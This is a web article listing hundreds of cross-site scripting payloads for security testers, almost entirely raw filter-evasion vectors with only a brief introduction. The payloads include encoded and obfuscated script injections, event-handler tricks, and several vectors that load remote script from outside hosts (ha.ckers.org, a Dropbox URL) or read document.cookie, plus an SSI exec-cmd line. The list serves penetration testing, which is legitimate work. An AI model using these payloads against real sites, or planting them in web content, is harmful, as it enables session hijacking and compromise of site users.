More than 500 Payloads Collection of Cross Site Scripting (XSS)

Motive of this article is to providing application security testing professionals with a guide to assist in Cross Site Scripting testing. This lists a collection of Cross Site Scripting XSS attacks that can be used to bypass certain XSS defensive filters and good enough for burp suit. This is a Common XSS JavaScript injection give a good indication of whether or not an application is vulnerable to XSS.

<script>alert(123);</script>

<ScRipT>alert(“XSS”);</ScRipT>

<script>alert(123)</script>

<script>alert(“hellox worldss”);</script>

<script>alert(“XSS”)</script>

<script>alert(“XSS”);</script>

<script>alert(‘XSS’)</script>

“><script>alert(“XSS”)</script>

<script>alert(/XSS”)</script>

<script>alert(/XSS/)</script>

</script><script>alert(1)</script>

<scr<object>ipt>alert(1)</script>

<scr<script>ipt>alert(1)</script>

<script><script>alert(1)</script>

‘; alert(1);

‘)alert(1);//

<ScRiPt>alert(1)</sCriPt>

<IMG SRC=jAVasCrIPt:alert(‘XSS’)>

<IMG SRC=”javascript:alert(‘XSS’);”>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=javascript:alert(‘XSS’)>     

<img src=xss onerror=alert(1)>

&lt;

%3C

&lt

&lt;

&LT

&LT;

&#60

&#060

&#0060

&#00060

&#000060

&#0000060

&lt;

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

&#x3c;

&#x03c;

&#x003c;

&#x0003c;

&#x00003c;

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;

&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

&#x3C;

&#x03C;

&#x003C;

&#x0003C;

&#x00003C;

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C

&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

<iframe %00 src=”&Tab;javascript:prompt(1)&Tab;”%00>

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>’

<input/onmouseover=”javaSCRIPT&colon;confirm&lpar;1&rpar;”

<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<form><isindex formaction=”javascript&colon;confirm(1)”

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src=’https://dl.dropbox.com/u/13018058/js.js’ /&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src=”data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>

<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

&#34;&#62;<h1/onmouseover=’\u0061lert(1)’>%00

<iframe/src=”data:text/html,<svg &#111;&#110;load=alert(1)>”>

<meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/>

<svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/’)></script

<svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js’ {Opera}

<meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”>

<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

<form><a href=”javascript:\u0061lert&#x28;1&#x29;”>X

</script><img/*%00/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/%00*/onerror=’eval(src)’>

<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

<form><iframe &#09;&#10;&#11; src=”javascript&#58;alert(1)”&#11;&#10;&#09;;>

<a href=”data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”&#09;&#10;&#11;>X</a

http://www.google<script .com>alert(document.location)</script

<a&#32;href&#61;&#91;&#00;&#93;”&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;”>XYZ</a

<img/src=@&#32;&#13; onerror = prompt(‘&#49;’)

<style/onload=prompt&#40;’&#88;&#83;&#83;’&#41;

<script ^__^>alert(String.fromCharCode(49))</script ^__^

</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; 🙁

&#00;</form><input type&#61;”date” onfocus=”alert(1)”>

<form><textarea &#13; onkeyup=’\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;’>

<script /***/>/***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450’)/***/</script /***/

<iframe srcdoc=’&lt;body onload=prompt&lpar;1&rpar;&gt;’>

<a href=”javascript:void(0)” onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<script ~~~>alert(0%0)</script ~~~>

<style/onload=&lt;!–&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>

<///style///><span %2F onmousemove=’alert&lpar;1&rpar;’>SPAN

<img/src=’http://i.imgur.com/P8mL8.jpg’ onmouseover=&Tab;prompt(1)

&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>’

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<marquee onstart=’javascript:alert&#x28;1&#x29;’>^__^

<div/style=”width:expression(confirm(1))”>X</div> {IE7}

<iframe/%00/ src=javaSCRIPT&colon;alert(1)

//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=’submit’>//

/*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src=’https://dl.dropbox.com/u/13018058/js.js’> //|\\ </script //|\\

</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

<a/href=”javascript:&#13; javascript:prompt(1)”><input type=”X”>

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>”<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>alert&#x28;1&#x29; {Opera}

<a href=”javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;”><button>

<div onmouseover=’alert&lpar;1&rpar;’>DIV</div>

<iframe style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>

<a href=”jAvAsCrIpT&colon;alert&lpar;1&rpar;”>X</a>

<embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf”>

<object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf”>

<var onmouseover=”prompt(1)”>On Mouse Over</var>

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

<img src=”/” =_=” title=”onerror=’prompt(1)'”>

<%<!–‘%><script>alert(1);</script –>

<script src=”data:text/javascript,alert(1)”></script>

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input value=<><iframe/src=javascript:confirm(1)

<input type=”text” value=“ <div/onmouseover=’alert(1)’>X</div>

http://www.<script>alert(1)</script .com

<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

<svg><script ?>alert(1)

<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

<img src=`xx:xx`onerror=alert(1)>

<meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>

<math><a xlink:href=”//jsfiddle.net/t846h/”>click

<embed code=”http://businessinfo.co.uk/labs/xss/xss.swf” allowscriptaccess=always>

<svg contentScriptType=text/vbs><script>MsgBox+1

<a href=”data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>”>X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u0061’) worksinIE>

<script>~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+

<script/src=”data&colon;text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061’)”></script a=\u0061 & /=%2F

<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

<script>+-+-1-+-+alert(1)</script>

<body/onload=&lt;!–&gt;&#10alert(1)>

<script itworksinallbrowsers>/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<div/onmouseover=’alert(1)’> style=”x:”>

<–`<img/src=` onerror=alert(1)> –!>

 <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

<div style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>

“><img src=x onerror=window.open(‘https://www.google.com/’);>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href=”//jsfiddle.net/t846h/”>click

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

<iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>

<a href=”data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203″>Click Me</a>

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=”jav ascript:alert(‘XSS’);”>

<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

foo<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

<BODY ONLOAD=alert(‘XSS’)>

<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>

<IMG SRC=”javascript:alert(‘XSS’)”

<iframe src=http://ha.ckers.org/scriptlet.html <

javascript:alert(“hellox worldss”)

<img src=”javascript:alert(‘XSS’);”>

<img src=javascript:alert(&quot;XSS&quot;)>

<“‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>

<SCRIPT a=”>” SRC=”http://ha.ckers.org/xss.js”></SCRIPT>

<SCRIPT a=”>” ” SRC=”http://ha.ckers.org/xss.js”></SCRIPT>

<SCRIPT “a=’>'” SRC=”http://ha.ckers.org/xss.js”></SCRIPT>

<SCRIPT a=”>’>” SRC=”http://ha.ckers.org/xss.js”></SCRIPT>

<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js”></SCRIPT>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

<“‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search

<script>alert(“hellox worldss”)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510

<script>alert(“XSS”);</script>&search=1

0&q=’;alert(String.fromCharCode(88,83,83))//\’;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search

<h1><font color=blue>hellox worldss</h1>

<BODY ONLOAD=alert(‘hellox worldss’)>

<input onfocus=write(XSS) autofocus>

<input onblur=write(XSS) autofocus><input autofocus>

<body onscroll=alert(XSS)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>

<form><button formaction=”javascript:alert(XSS)”>lol

<!–<img src=”–><img src=x onerror=alert(XSS)//”>

<![><img src=”]><img src=x onerror=alert(XSS)//”>

<style><img src=”</style><img src=x onerror=alert(XSS)//”>

<? foo=”><script>alert(1)</script>”>

<! foo=”><script>alert(1)</script>”>

</ foo=”><script>alert(1)</script>”>

<? foo=”><x foo=’?><script>alert(1)</script>’>”>

<! foo=”[[[Inception]]”><x foo=”]foo><script>alert(1)</script>”>

<% foo><x foo=”%><script>alert(123)</script>”>

<div style=”font-family:’foo&#10;;color:red;’;”>LOL

LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>

<script>({0:#0=alert/#0#/#0#(0)})</script>

<svg xmlns=”http://www.w3.org/2000/svg”>LOL<script>alert(123)</script></svg>

&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;

\\”;alert(‘XSS’);//

&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\”XSS\”);&lt;/SCRIPT&gt;

&lt;INPUT TYPE=\”IMAGE\” SRC=\”javascript&#058;alert(‘XSS’);\”&gt;

&lt;BODY BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;

&lt;BODY ONLOAD=alert(‘XSS’)&gt;

&lt;IMG DYNSRC=\”javascript&#058;alert(‘XSS’)\”&gt;

&lt;IMG LOWSRC=\”javascript&#058;alert(‘XSS’)\”&gt;

&lt;BGSOUND SRC=\”javascript&#058;alert(‘XSS’);\”&gt;

&lt;BR SIZE=\”&{alert(‘XSS’)}\”&gt;

&lt;LAYER SRC=\”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\”&gt;&lt;/LAYER&gt;

&lt;LINK REL=\”stylesheet\” HREF=\”javascript&#058;alert(‘XSS’);\”&gt;

&lt;LINK REL=\”stylesheet\” HREF=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;css\”&gt;

&lt;STYLE&gt;@import’http&#58;//ha&#46;ckers&#46;org/xss&#46;css’;&lt;/STYLE&gt;

&lt;META HTTP-EQUIV=\”Link\” Content=\”&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\”&gt;

&lt;STYLE&gt;BODY{-moz-binding&#58;url(\”http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\”)}&lt;/STYLE&gt;

&lt;XSS STYLE=\”behavior&#58; url(xss&#46;htc);\”&gt;

&lt;STYLE&gt;li {list-style-image&#58; url(\”javascript&#058;alert(‘XSS’)\”);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS

&lt;IMG SRC=’vbscript&#058;msgbox(\”XSS\”)’&gt;

&lt;IMG SRC=\”mocha&#58;&#91;code&#93;\”&gt;

&lt;IMG SRC=\”livescript&#058;&#91;code&#93;\”&gt;

žscriptualert(EXSSE)ž/scriptu

&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript&#058;alert(‘XSS’);\”&gt;

&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”&gt;

&lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http&#58;//;URL=javascript&#058;alert(‘XSS’);\”

&lt;IFRAME SRC=\”javascript&#058;alert(‘XSS’);\”&gt;&lt;/IFRAME&gt;

&lt;FRAMESET&gt;&lt;FRAME SRC=\”javascript&#058;alert(‘XSS’);\”&gt;&lt;/FRAMESET&gt;

&lt;TABLE BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;

&lt;TABLE&gt;&lt;TD BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;

&lt;DIV STYLE=\”background-image&#58; url(javascript&#058;alert(‘XSS’))\”&gt;

&lt;DIV STYLE=\”background-image&#58;\0075\0072\006C\0028’\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029’\0029\”&gt;

&lt;DIV STYLE=\”background-image&#58; url(javascript&#058;alert(‘XSS’))\”&gt;

&lt;DIV STYLE=\”width&#58; expression(alert(‘XSS’));\”&gt;

&lt;STYLE&gt;@im\port’\ja\vasc\ript&#58;alert(\”XSS\”)’;&lt;/STYLE&gt;

&lt;IMG STYLE=\”xss&#58;expr/*XSS*/ession(alert(‘XSS’))\”&gt;

&lt;XSS STYLE=\”xss&#58;expression(alert(‘XSS’))\”&gt;

exp/*&lt;A STYLE=’no\xss&#58;noxss(\”*//*\”);

xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\”XSS\”))’&gt;

&lt;STYLE TYPE=\”text/javascript\”&gt;alert(‘XSS’);&lt;/STYLE&gt;

&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\”javascript&#058;alert(‘XSS’)\”);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;

&lt;STYLE type=\”text/css\”&gt;BODY{background&#58;url(\”javascript&#058;alert(‘XSS’)\”)}&lt;/STYLE&gt;

&lt;!–&#91;if gte IE 4&#93;&gt;

&lt;SCRIPT&gt;alert(‘XSS’);&lt;/SCRIPT&gt;

&lt;!&#91;endif&#93;–&gt;

&lt;BASE HREF=\”javascript&#058;alert(‘XSS’);//\”&gt;

&lt;OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\”&gt;&lt;/OBJECT&gt;

&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(‘XSS’)&gt;&lt;/OBJECT&gt;

&lt;EMBED SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\” AllowScriptAccess=\”always\”&gt;&lt;/EMBED&gt;

&lt;EMBED SRC=\”data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”&gt;&lt;/EMBED&gt;

a=\”get\”;

b=\”URL(\\”\”;

c=\”javascript&#058;\”;

d=\”alert(‘XSS’);\\”)\”;

eval(a+b+c+d);

&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\”xss\” implementation=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\”&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;

&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\”javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(‘XSS’);\”&gt;&#93;&#93;&gt;

&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;

&lt;XML ID=\”xss\”&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\”javas&lt;!– –&gt;cript&#58;alert(‘XSS’)\”&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;

&lt;SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”&gt;&lt;/SPAN&gt;

&lt;XML SRC=\”xsstest&#46;xml\” ID=I&gt;&lt;/XML&gt;

&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;

&lt;HTML&gt;&lt;BODY&gt;

&lt;?xml&#58;namespace prefix=\”t\” ns=\”urn&#58;schemas-microsoft-com&#58;time\”&gt;

&lt;?import namespace=\”t\” implementation=\”#default#time2\”&gt;

&lt;t&#58;set attributeName=\”innerHTML\” to=\”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\”&gt;

&lt;/BODY&gt;&lt;/HTML&gt;

&lt;SCRIPT SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\”&gt;&lt;/SCRIPT&gt;

&lt;!–#exec cmd=\”/bin/echo ‘&lt;SCR’\”–&gt;&lt;!–#exec cmd=\”/bin/echo ‘IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;’\”–&gt;

&lt;? echo(‘&lt;SCR)’;

echo(‘IPT&gt;alert(\”XSS\”)&lt;/SCRIPT&gt;’); ?&gt;

&lt;IMG SRC=\”http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\”&gt;

Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser

&lt;META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;\”&gt;

&lt;HEAD&gt;&lt;META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-

&lt;SCRIPT a=\”&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT =\”&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT a=\”&gt;\” ” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT \”a=’&gt;’\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT a=`&gt;` SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT a=\”&gt;’&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT&gt;document&#46;write(\”&lt;SCRI\”);&lt;/SCRIPT&gt;PT SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;A HREF=\”http&#58;//66&#46;102&#46;7&#46;147/\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//1113982867/\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//0102&#46;0146&#46;0007&#46;00000223/\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”//www&#46;google&#46;com/\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”//google\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//ha&#46;ckers&#46;org@google\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//google&#58;ha&#46;ckers&#46;org\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//google&#46;com/\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//www&#46;google&#46;com&#46;/\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”javascript&#058;document&#46;location=’http&#58;//www&#46;google&#46;com/’\”&gt;XSS&lt;/A&gt;

&lt;A HREF=\”http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\”&gt;XSS&lt;/A&gt;

&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;

&lt;IMG SRC=\”javascript&#058;alert(‘XSS’)\”

&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;

&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;

&lt;&lt;SCRIPT&gt;alert(\”XSS\”);//&lt;&lt;/SCRIPT&gt;

&lt;SCRIPT/SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;

&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\”XSS\”)&gt;

